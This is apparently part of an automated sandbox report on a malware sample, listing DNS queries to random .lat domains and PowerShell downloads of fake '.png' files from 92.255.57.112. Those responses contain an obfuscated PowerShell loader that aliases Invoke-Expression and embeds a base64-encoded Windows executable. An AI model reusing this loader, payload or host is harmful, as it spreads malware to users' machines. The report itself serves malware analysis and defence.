                                                                                                                                                                                                Jan 15, 2025 10:09:11.941157103 CET1.1.1.1192.168.2.50xe773Name error (3)savorraiykj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.960304022 CET1.1.1.1192.168.2.50xdd38Name error (3)shoefeatthe.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:11.989171028 CET1.1.1.1192.168.2.50x5043Name error (3)finickypwk.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:12.002445936 CET1.1.1.1192.168.2.50x5b32No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:18.847306013 CET1.1.1.1192.168.2.50x46bfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:18.847306013 CET1.1.1.1192.168.2.50x46bfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:36.232635021 CET1.1.1.1192.168.2.50x7411Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                Jan 15, 2025 10:09:39.175405025 CET1.1.1.1192.168.2.50xacccName error (3)56.163.245.4.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                • view-reserve.com
                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                • 92.255.57.112
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.54970792.255.57.112806528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Jan 15, 2025 10:09:09.307121992 CET70OUTGET /1/2.png HTTP/1.1
                                                                                                                                                                                                Host: 92.255.57.112
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015784025 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                Last-Modified: Tue, 14 Jan 2025 22:09:21 GMT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                ETag: "a36a62f6d066db1:0"
                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                Date: Wed, 15 Jan 2025 09:09:09 GMT
                                                                                                                                                                                                Content-Length: 526214
                                                                                                                                                                                                Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACs
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015805006 CET224INData Raw: 4b 4b 47 77 43 41 41 59 6f 5a 51 45 41 42 67 73 48 49 4c 4b 41 55 38 63 6f 41 67 41 41 4b 78 63 6f 51 41 49 41 42 68 4d 45 45 51 51 57 4b 44 73 43 41 41 59 6f 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49
                                                                                                                                                                                                Data Ascii: KKGwCAAYoZQEABgsHILKAU8coAgAAKxcoQAIABhMEEQQWKDsCAAYo2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCF
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015830994 CET1236INData Raw: 79 4a 53 59 52 42 69 42 52 6f 41 77 53 57 6d 45 72 68 78 54 2b 42 67 4d 41 41 41 5a 7a 64 67 41 41 43 69 6a 2b 41 41 41 47 44 51 6b 58 4b 4d 30 43 41 41 59 4a 66 67 77 42 41 41 51 6f 63 67 45 41 42 69 41 4a 7a 4b 43 42 4f 46 6e 2f 2f 2f 39 2b 2b
                                                                                                                                                                                                Data Ascii: yJSYRBiBRoAwSWmErhxT+BgMAAAZzdgAACij+AAAGDQkXKM0CAAYJfgwBAAQocgEABiAJzKCBOFn///9++gAABCh8AgAGEQYgaBPdu1og7iedgWE4PP///yoTMAUARQEAAAMAABECKL8AAAYKIHyKaEEgd1OOQ2ElCx8KXkUKAAAA/AAAALAAAACcAAAAeQAAAOAAAAAFAAAAOQAAAMP////MAAAAIQAAADj3AAAABi0IIAzu7o
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015842915 CET1236INData Raw: 41 41 50 34 41 41 41 41 75 41 41 41 41 78 51 41 41 41 41 55 41 41 41 42 49 41 41 41 41 71 51 41 41 41 44 67 50 41 51 41 41 45 51 51 65 4d 67 67 67 36 33 30 59 77 69 55 72 42 69 44 6f 78 2f 75 78 4a 53 59 72 70 42 59 54 42 42 45 4a 49 4e 64 37 5a
                                                                                                                                                                                                Data Ascii: AAP4AAAAuAAAAxQAAAAUAAABIAAAAqQAAADgPAQAAEQQeMggg630YwiUrBiDox/uxJSYrpBYTBBEJINd7ZdFaIHIBx1phK5EbKLwBAAYMEQkgdwR4Dlog9klhNmE4d////xEGFyhEAQAGEwcRCSC+eW6WWiB1I4MIYTha////BiheAgAGEwUJEQXSbh4RBFofP19iYA0RBBdYEwQguY9K5zgz////BggWGyj9AQAGJhEJINxK0L
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015856028 CET448INData Raw: 59 45 77 59 52 43 78 35 6b 30 70 77 52 43 42 45 47 4a 52 64 59 45 77 59 52 43 78 38 51 5a 4e 4b 63 45 51 77 67 2b 4b 61 4a 71 56 6f 67 6e 5a 64 61 48 57 45 34 6f 2f 33 2f 2f 78 59 54 42 52 59 54 42 68 45 4d 49 49 63 73 71 65 52 61 49 45 6b 4a 4d
                                                                                                                                                                                                Data Ascii: YEwYRCx5k0pwRCBEGJRdYEwYRCx8QZNKcEQwg+KaJqVognZdaHWE4o/3//xYTBRYTBhEMIIcsqeRaIEkJMElhOIr9//8RBxoRBxqVCBqVYZ4RBxsRBxuVCBuVYZ4RBxwRBxyVCByVYZ4RBx0RBx2VCB2VYZ4RBx4RBx6VCB6VYZ4RBx8JEQcfCZUIHwmVYZ4RBx8KEQcfCpUIHwqVYZ4RDCA/KYYxWiDPef4VYTgd/f//EQcfCx
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015868902 CET1236INData Raw: 65 45 51 77 67 55 36 54 71 39 56 6f 67 79 53 76 53 6b 32 45 34 61 2f 7a 2f 2f 78 45 4b 46 31 67 54 43 68 45 4d 49 4d 67 64 41 4c 78 61 49 4d 64 55 43 50 5a 68 4f 46 4c 38 2f 2f 38 52 42 78 38 4e 45 51 63 66 44 5a 55 49 48 77 32 56 59 5a 34 52 42
                                                                                                                                                                                                Data Ascii: eEQwgU6Tq9VogySvSk2E4a/z//xEKF1gTChEMIMgdALxaIMdUCPZhOFL8//8RBx8NEQcfDZUIHw2VYZ4RBx8OEQcfDpUIHw6VYZ4RBx8PEQcfD5UIHw+VYZ4WEwoRDCDDqDfUWiBWpnwtYTgP/P//CQkfGWJhDREMIN6HzGpaIEkke8thOPX7//8RCR8QMgggaKYCayUrBiD2WtIRJSY42/v//xEFagZuMgggk4uIECUrBiBfVB
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015883923 CET1236INData Raw: 52 42 79 41 58 43 2f 6b 61 57 69 43 77 65 76 4a 73 59 54 69 4b 2f 66 2f 2f 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 58 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48
                                                                                                                                                                                                Data Ascii: RByAXC/kaWiCwevJsYTiK/f//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgDBEHIAEM7apaIFPLZqJhODf9//8GbhZqMwggxy5n7CUrBiCXiEeOJSY4Hf3//xEHINFqpcRaIFomiY5hOAr9//8HKhMwCQDeAgAABgAAEQIgrSuifFogSN6vImEQAAIfHmQKIB
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015901089 CET1236INData Raw: 4b 6d 43 42 4b 34 39 44 6b 59 53 55 54 42 78 38 4c 58 6b 55 4c 41 41 41 41 74 41 45 41 41 42 67 43 41 41 43 48 41 41 41 41 57 67 41 41 41 4c 37 2f 2f 2f 39 30 41 41 41 41 34 77 45 41 41 49 63 42 41 41 41 46 41 41 41 41 51 41 41 41 41 44 51 42 41
                                                                                                                                                                                                Data Ascii: KmCBK49DkYSUTBx8LXkULAAAAtAEAABgCAACHAAAAWgAAAL7///90AAAA4wEAAIcBAAAFAAAAQAAAADQBAAA4EwIAAAIfHmQKEgH+FQEAABsCIP///z9fEAACGGIQAAZuGGozCCDMz9+5JSsGIOj6YrolJhEHIBYGPn9aYSuDBm4Wai4IIPBWA5ElKwYgHcgexSUmOGn///8GbhlqMwggk5+8zSUrBiAmFjSxJSY4T////xEHIE
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015925884 CET1236INData Raw: 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 42 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 47 47 4a 67 45 77 55 52 42 79 43 32 55 69 66 68 57 69 43 59 65 41 42 71 59 54 69 62 2f
                                                                                                                                                                                                Data Ascii: XWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwURByC2UifhWiCYeABqYTib/v//F40BAAAbDREHIErXwQ9aIFwsNhFhOIH+//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmAMEQcg0Xgi1loghW4Qu2E4Lv7//34BAAAEAiUXWB
                                                                                                                                                                                                Jan 15, 2025 10:09:10.015942097 CET328INData Raw: 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69 59 42 4d 45 45 51 63 67 63 2b 34 41 43 6c 6f 67 75 31 2b 57 55 47 45 34 48 2f 37 2f 2f 77 5a 75 47 47 6f 7a 43 43 43 65 7a
                                                                                                                                                                                                Data Ascii: AAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMEEQcgc+4AClogu1+WUGE4H/7//wZuGGozCCCezg3gJSsGIFVtuPslJjgF/v//F40BAAAbDREHINozaShaIHy3fLlhOOv9//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBdABAAAbKHoBAAYocA
                                                                                                                                                                                                Jan 15, 2025 10:09:10.020905972 CET1236INData Raw: 48 49 41 4a 61 68 55 68 61 49 45 32 34 36 57 31 68 4f 45 7a 39 2f 2f 38 43 48 78 35 6b 43 68 45 48 49 44 49 33 78 2b 68 61 49 47 49 37 6b 48 35 68 4f 44 54 39 2f 2f 38 52 42 79 44 46 7a 49 5a 42 57 69 44 48 53 4c 6f 5a 59 54 67 68 2f 66 2f 2f 42
                                                                                                                                                                                                Data Ascii: HIAJahUhaIE246W1hOEz9//8CHx5kChEHIDI3x+haIGI7kH5hODT9//8RByDFzIZBWiDHSLoZYTgh/f//ByoAAAATMAgA9QQAAAUAABEgcAAAAAogxUI+8iBPmDDbYSUTDB8jXkUjAAAAAwMAALEAAABUAgAA3QMAAF7///+XAgAAywIAACUAAAB7AgAAzAMAAG4CAAD0AAAAzAEAADgDAAANAQAA8AMAADYEAACCAwAAOgIAAB


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.54970892.255.57.112801644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Jan 15, 2025 10:09:09.331552982 CET70OUTGET /1/3.png HTTP/1.1
                                                                                                                                                                                                Host: 92.255.57.112
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018574953 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                Last-Modified: Tue, 14 Jan 2025 22:31:44 GMT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                ETag: "162f316d466db1:0"
                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                Date: Wed, 15 Jan 2025 09:09:09 GMT
                                                                                                                                                                                                Content-Length: 538502
                                                                                                                                                                                                Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACsK
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018635988 CET1236INData Raw: 4b 47 77 43 41 41 59 6f 5a 51 45 41 42 67 73 48 49 4c 4b 41 55 38 63 6f 41 67 41 41 4b 78 63 6f 51 41 49 41 42 68 4d 45 45 51 51 57 4b 44 73 43 41 41 59 6f 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 42
                                                                                                                                                                                                Data Ascii: KGwCAAYoZQEABgsHILKAU8coAgAAKxcoQAIABhMEEQQWKDsCAAYo2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhxT
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018649101 CET1236INData Raw: 42 41 41 47 41 41 41 41 41 51 41 41 45 53 6a 5a 41 67 41 47 4b 67 41 41 45 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 69 72 41 51 41 47 4b 67 41 54 4d 41 51 41 42 77 41 41 41 41 45 41 41 42 45 43 4b 4c 55 41 41 41 59 71 41 42 4d 77 42 41
                                                                                                                                                                                                Data Ascii: BAAGAAAAAQAAESjZAgAGKgAAEzAEAAcAAAABAAARAiirAQAGKgATMAQABwAAAAEAABECKLUAAAYqABMwBAAHAAAAAQAAEQIoqwEABioAEzAEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAAU
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018661976 CET672INData Raw: 63 76 37 2f 2f 78 45 45 46 31 67 54 42 42 45 4d 49 4d 6e 59 63 6c 56 61 49 48 52 6b 74 74 46 68 4f 46 6e 2b 2f 2f 38 52 44 43 44 41 6b 32 2f 65 57 69 41 46 57 55 53 32 59 54 68 47 2f 76 2f 2f 45 51 67 6f 49 51 45 41 42 6f 41 42 41 41 41 45 45 51
                                                                                                                                                                                                Data Ascii: cv7//xEEF1gTBBEMIMnYclVaIHRkttFhOFn+//8RDCDAk2/eWiAFWUS2YThG/v//EQgoIQEABoABAAAEEQwgOyOvkVogNl4kIWE4J/7//xEFHxBYEwURDCAN0E+OWiDs0WVtYTgN/v//EQofEC8IILcaN0MlKwYgdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJRd
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018681049 CET1236INData Raw: 45 51 77 67 55 36 54 71 39 56 6f 67 79 53 76 53 6b 32 45 34 61 2f 7a 2f 2f 78 45 4b 46 31 67 54 43 68 45 4d 49 4d 67 64 41 4c 78 61 49 4d 64 55 43 50 5a 68 4f 46 4c 38 2f 2f 38 52 42 78 38 4e 45 51 63 66 44 5a 55 49 48 77 32 56 59 5a 34 52 42 78
                                                                                                                                                                                                Data Ascii: EQwgU6Tq9VogySvSk2E4a/z//xEKF1gTChEMIMgdALxaIMdUCPZhOFL8//8RBx8NEQcfDZUIHw2VYZ4RBx8OEQcfDpUIHw6VYZ4RBx8PEQcfD5UIHw+VYZ4WEwoRDCDDqDfUWiBWpnwtYTgP/P//CQkfGWJhDREMIN6HzGpaIEkke8thOPX7//8RCR8QMgggaKYCayUrBiD2WtIRJSY42/v//xEFagZuMgggk4uIECUrBiBfVBA
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018695116 CET1236INData Raw: 42 79 41 58 43 2f 6b 61 57 69 43 77 65 76 4a 73 59 54 69 4b 2f 66 2f 2f 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 58 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78
                                                                                                                                                                                                Data Ascii: ByAXC/kaWiCwevJsYTiK/f//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgDBEHIAEM7apaIFPLZqJhODf9//8GbhZqMwggxy5n7CUrBiCXiEeOJSY4Hf3//xEHINFqpcRaIFomiY5hOAr9//8HKhMwCQDeAgAABgAAEQIgrSuifFogSN6vImEQAAIfHmQKIBi
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018749952 CET1236INData Raw: 6d 43 42 4b 34 39 44 6b 59 53 55 54 42 78 38 4c 58 6b 55 4c 41 41 41 41 74 41 45 41 41 42 67 43 41 41 43 48 41 41 41 41 57 67 41 41 41 4c 37 2f 2f 2f 39 30 41 41 41 41 34 77 45 41 41 49 63 42 41 41 41 46 41 41 41 41 51 41 41 41 41 44 51 42 41 41
                                                                                                                                                                                                Data Ascii: mCBK49DkYSUTBx8LXkULAAAAtAEAABgCAACHAAAAWgAAAL7///90AAAA4wEAAIcBAAAFAAAAQAAAADQBAAA4EwIAAAIfHmQKEgH+FQEAABsCIP///z9fEAACGGIQAAZuGGozCCDMz9+5JSsGIOj6YrolJhEHIBYGPn9aYSuDBm4Wai4IIPBWA5ElKwYgHcgexSUmOGn///8GbhlqMwggk5+8zSUrBiAmFjSxJSY4T////xEHIEx
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018764973 CET1236INData Raw: 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 42 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 47 47 4a 67 45 77 55 52 42 79 43 32 55 69 66 68 57 69 43 59 65 41 42 71 59 54 69 62 2f 76
                                                                                                                                                                                                Data Ascii: WBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwURByC2UifhWiCYeABqYTib/v//F40BAAAbDREHIErXwQ9aIFwsNhFhOIH+//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmAMEQcg0Xgi1loghW4Qu2E4Lv7//34BAAAEAiUXWBA
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018779039 CET1236INData Raw: 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69 59 42 4d 45 45 51 63 67 63 2b 34 41 43 6c 6f 67 75 31 2b 57 55 47 45 34 48 2f 37 2f 2f 77 5a 75 47 47 6f 7a 43 43 43 65 7a 67
                                                                                                                                                                                                Data Ascii: AAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMEEQcgc+4AClogu1+WUGE4H/7//wZuGGozCCCezg3gJSsGIFVtuPslJjgF/v//F40BAAAbDREHINozaShaIHy3fLlhOOv9//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBdABAAAbKHoBAAYocAI
                                                                                                                                                                                                Jan 15, 2025 10:09:10.018791914 CET1236INData Raw: 48 77 36 56 59 5a 34 52 44 43 41 34 42 47 71 69 57 69 41 57 65 73 41 62 59 54 69 58 2f 66 2f 2f 45 51 63 66 44 78 45 48 48 77 2b 56 43 42 38 50 6c 57 47 65 45 51 77 67 57 47 64 70 65 6c 6f 67 72 58 6c 70 58 57 45 34 64 66 33 2f 2f 78 45 49 45 51
                                                                                                                                                                                                Data Ascii: Hw6VYZ4RDCA4BGqiWiAWesAbYTiX/f//EQcfDxEHHw+VCB8PlWGeEQwgWGdpelogrXlpXWE4df3//xEIEQYlF1gTBhELHmTSnBEIEQYlF1gTBhELHxBk0pwRDCCD1/2MWiCIlLS/YThD/f//EQUfEFgTBREMIKnntS5aIDp/HZhhOCn9//8RCR8QLwggdrm7gCUrBiBswxqFJSY4D/3//xEKHxAvCCBsydCsJSsGIE1aQoAlJjj
                                                                                                                                                                                                Jan 15, 2025 10:09:10.023636103 CET1236INData Raw: 41 41 41 43 65 77 55 41 41 41 52 5a 47 32 52 59 66 51 55 41 41 41 51 44 65 77 6b 41 41 41 51 67 41 41 41 41 41 54 63 53 47 6b 55 42 41 41 41 41 39 76 2f 2f 2f 79 42 37 6a 55 49 54 4a 53 73 47 49 4e 35 30 44 7a 55 6c 4a 67 63 67 70 5a 6a 30 53 6c
                                                                                                                                                                                                Data Ascii: AAACewUAAARZG2RYfQUAAAQDewkAAAQgAAAAATcSGkUBAAAA9v///yB7jUITJSsGIN50DzUlJgcgpZj0SlphOG7///8WKiDTRP/mOGL///8DJXsIAAAEBll9CAAABAIlewUAAAQCewUAAAQbZFl9BQAABAcgvlV0y1ogAuU9IGE4Lf///wMDewgAAAQeYgN7CgAABCheAgAGJSbSYH0IAAAEByBkeiAYWiDJuM0ZYTj+/v//AwN


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.54970992.255.57.112803276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Jan 15, 2025 10:09:09.351928949 CET70OUTGET /1/1.png HTTP/1.1
                                                                                                                                                                                                Host: 92.255.57.112
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062393904 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                Last-Modified: Tue, 14 Jan 2025 20:24:05 GMT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                ETag: "c7d94542c266db1:0"
                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                Date: Wed, 15 Jan 2025 09:09:09 GMT
                                                                                                                                                                                                Content-Length: 122758
